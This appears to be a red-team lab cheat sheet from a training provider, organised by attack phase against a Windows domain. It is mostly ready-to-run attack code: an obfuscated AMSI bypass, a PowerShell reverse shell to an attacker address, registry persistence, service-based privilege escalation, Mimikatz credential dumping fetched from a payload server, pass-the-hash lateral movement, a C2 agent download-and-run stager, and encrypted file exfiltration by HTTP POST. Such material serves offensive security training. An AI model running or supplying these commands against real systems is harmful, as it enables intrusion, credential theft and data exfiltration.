user-img

CyberWarFare Labs

Initial Access

PS Remoting with Failed Login Attempt: 
powershell -ep bypass
$UserName = 'cyberwarfare\emp1’
$Password = ‘Wrong_Password'
$securepassword = ConvertTo-SecureString $Password -AsPlainText -Force
$pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword)
$sess = New-Pssession -ComputerName 10.10.10.5 -Credential $pscredentials –Verbose
PS Remoting with Successful Login Attempt: 
powershell -ep bypass
$UserName = 'cyberwarfare\emp1’
$Password = 'Serious@963'
$securepassword = ConvertTo-SecureString $Password -AsPlainText -Force
$pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword)
$sess = New-Pssession -ComputerName 10.10.10.5 -Credential $pscredentials –Verbose

Execution

Bypass AMSI: 
[Ref].Assembly.GetType('System.Management.Automation.'+$([Char]([bYtE]0x41)+[CHar]([bYte]0x6D)+[CHar]([byTE]0x73)+[chAR]([byTe]0x69))+'Utils').GetField(''+$([ChAr]([Byte]0x61)+[chAR](8938/82)+[cHAR](115)+[CHAR]([bYtE]0x69))+'InitFailed',$([Char](13+65)+[ChAr]([bYTe]0x6F)+[chAr](141-31)+[CHAR](80)+[CHAr]([bYte]0x75)+[cHar]([byTe]0x62)+[CHAr]([byTE]0x6C)+[chAr]([bYte]0x69)+[CHAR](74+25)+[cHar]([Byte]0x2C)+[CHar]([bYTE]0x53)+[CHAR]([byTe]0x74)+[cHaR](97)+[CHAr](105+11)+[cHaR](9870/94)+[CHAR]([bytE]0x63))).SetValue($null,$true);
Start listening on specified TCP port (Attacker Machine): 
nc -nlvp 4443
Reverse Shell: 
$client = New-Object System.Net.Sockets.TCPClient('192.168.150.4',4443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

Persistence

Registry Modification in Windows: 
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Temp\lab.exe"
2.
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Privilege Escalation

Windows Service Modify:
sc.exe config snmptrap binpath= "net localgroup Administrators cyberwarfare\empX /add"
sc.exe stop snmptrap
sc.exe start snmptrap

[logoff]

[then login again]

Defense Evasion

 -> Change Permissions: - 

icacls . /grant Everyone:F /T /C /Q 
                                
-> Change the folder permissions of "C:\users\Administrator": -
                                        
$acl = Get-Acl C:\users\Administrator

$AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("CYBERWARFARE\empX","FullControl","Allow")
                                        
$acl.SetAccessRule($AccessRule)
                                        
$acl | Set-Acl C:\users\Administrator
                                        
(View the change) 
                                        
Get-Acl C:\users\Administrator |fl
                                        
                                
-> Remove the set permissions: -
                                        
$acl = Get-Acl C:\users\Administrator

$usersid = New-Object System.Security.Principal.Ntaccount ("ENTERPRISE\empX")
                                        
$acl.PurgeAccessRules($usersid)
                                        
$acl | Set-Acl C:\users\Administrator
                                        
(See the removal of permissions)
                                        
Get-Acl C:\users\Administrator |fl

Credential Access

OS credential Dumping: 
1. Download Credential Dumping Script from Payload-Server: 

iwr –usebasicparsing http://192.168.250.100/Invoke-Mimikatz.ps1  -OutFile Invoke-Mimikatz.ps1

2. Execute Credential Dumping script on compromised machine: 

.\Invoke-Mimikatz.ps1

Invoke-Mimikatz -verbose

Discovery

Domain Trust Discovery: 
-> Domain Users Discovery:

net user /domain

-> Domain Group Discovery: 

net group "Domain Admins" /domain

Lateral Movement

Use Alternate Authentication Material 
1.1) Download Lateral Movement Script from Payload-Server:

iwr –usebasicparsing http://192.168.250.100/Invoke-WMIExec.ps1 -OutFile Invoke-WMIExec.ps1

1.2) Execute Lateral Movement Attack on Domain Controller using Pass-the-Hash (PTH):

Invoke-WMIExec -Target 10.10.10.2 -Domain cyberwarfare -Username administrator -Hash 03D1BBD771D9D72827199B9F815635AB  -Command "notepad.exe" -verbose

Data Collection

Collecting password from registry: -

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon“

Command & Control

Caldera C2 server Network Communication:
 
$server="http://192.168.250.X:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;

Data Exfiltration

Automated Exfiltration: -

Step 1: On the Attacker machine, start listening using ‘netcat’

nc64.exe -nlvp 4445

Step 2: On Victim Machine

$file = Get-Content C:\Users\priv\Documents\file.txt
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("FEZjEGYbbcyXQHgbZFAbgf94r")
$securestring = new-object System.Security.SecureString
foreach ($char in $file.toCharArray()) {
      $secureString.AppendChar($char)
}
$encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key

Step 3: POST request from Victim Machine: 

Invoke-WebRequest -Uri http://192.168.150.4 -Method POST -Body $encryptedData